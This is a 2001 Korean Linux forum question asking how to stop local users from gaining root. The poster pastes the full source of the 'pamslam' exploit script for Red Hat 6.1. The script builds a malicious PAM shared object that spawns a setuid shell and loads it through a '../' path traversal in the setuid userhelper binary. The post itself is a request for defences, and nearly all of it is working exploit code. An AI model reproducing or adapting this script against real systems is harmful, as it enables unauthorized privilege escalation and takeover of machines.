>> Read No. 18134 article  
[질문]해킹프로그램에 대한대책은?

등록 2001-01-17 23:28:00     조회 2
이름 서동규    

		계정사용자가  아래의 두 파일을 이용해서 root권한을 갖게 되는데
이에 대한 방지 대책이 필요하답니다.
고수님들의 답변 부탁드립니다.
 _pamslam.o
pam.sh
 위 두 파일 중 pam.sh 를 실행하면
 _pamslam.c
_pamslam.conf
_pamslam.so
 위와 같은 세파일이 생성되고 root권한을 바로 갖게 된답니다.
   참고로 pam.sh 의 소스는 아래와 같답니다.
 #!/bin/sh
#
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog at l0pht.com # 
# synopsis:
#    both 'pam' and 'userhelper' (a setuid binary that comes with the
#    'usermode-1.15' rpm) follow .. paths. Since pam_start calls down to
#    _pam_add_handler(), we can get it to dlopen any file on disk. 'userhelper'
#    being setuid means we can get root.
#
# fix:
#    No fuckin idea for a good fix. Get rid of the .. paths in userhelper
#    for a quick fix. Remember 'strcat' isn't a very good way of confining
#    a path to a particular subdirectory.
#
# props to my mommy and daddy, cuz they made me drink my milk.
 cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>
void _init(void)
{
setuid(geteuid());
system("/bin/sh");
}
EOF
 echo -n .
 echo -e auth	required	$PWD/_pamslam.so > _pamslam.conf
chmod 755 _pamslam.conf
 echo -n .
 gcc -fPIC -o _pamslam.o -c _pamslam.c
 echo -n o
echo "where are you man"
ld -shared -o _pamslam.so _pamslam.o
 /usr/bin/whoami
echo -n o
 /usr/bin/whoami
chmod 755 _pamslam.so
 /usr/bin/whoami
echo -n O
 /usr/bin/whoami
#rm _pamslam.c
#rm _pamslam.o
 echo O
 /usr/bin/whoami
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf;whoami
echo "where are you man"
sleep 1s
#rm _pamslam.so
#rm _pamslam.conf
이름
암호
Register [ localhost 목록보기 윗글 아랫글
글쓰기
답장쓰기 수정 삭제
정규표현식 [ 상세 검색 ]
페이지로딩: [ 0.82 초 ] 작업시간: [ 0.11 초 ]

Copyleft 1999-2026 by JSBoard Open Project
Theme Designed by IDOO All right reserved
[TOP]

적수네 동네
+
| 적수네 동네
| 공부방
| 리눅스 잡지 서고
| LSN 소스
| 링크 모음
+---+
게시판
+
| 떠들어보세!
| 질문과 답변
| 새소식과 정보
| 1원짜리 팁?
| 대화방
+---+
칼럼?
+
| 세하 훔쳐보기
| Welcome2nite
| 혜진의 염장판
+---+
리눅스 상표권
+
| 반대 서명란
| 토론 게시판
+---+
GNU
+
| GNU 선언문
| GNU GPL
| GNU 미러 목록
+---+
프로젝트?
+
| 리눅스카운터
| RC5DES
| 실질헌법 제작
+---+
커널 소식
+
| 안정 버젼: 2.4.14
+---+
테마 선택
+
LSN 방송국?
+
| OFF AIR
+---+
회원
+
| 로그인
+---+
[ 적수네 동네 ] [ 리눅스 상표권 독점 반대 ] [ 한글 리눅스 문서 프로젝트 ] [ KrLine ] [ 사랑넷 ] [ Valid HTML 4.0! ] [ SlashDot ] [ Freshmeat ]
Copyleft (C) 1998-2001 Byeong-Chan Kim . License
TIME: 1789664025
System by WYZsoft, HDD by I.O.Linux, Mizi Research, Embryo, WOWLINUX, Domain by SarangNet, Network by KrLine.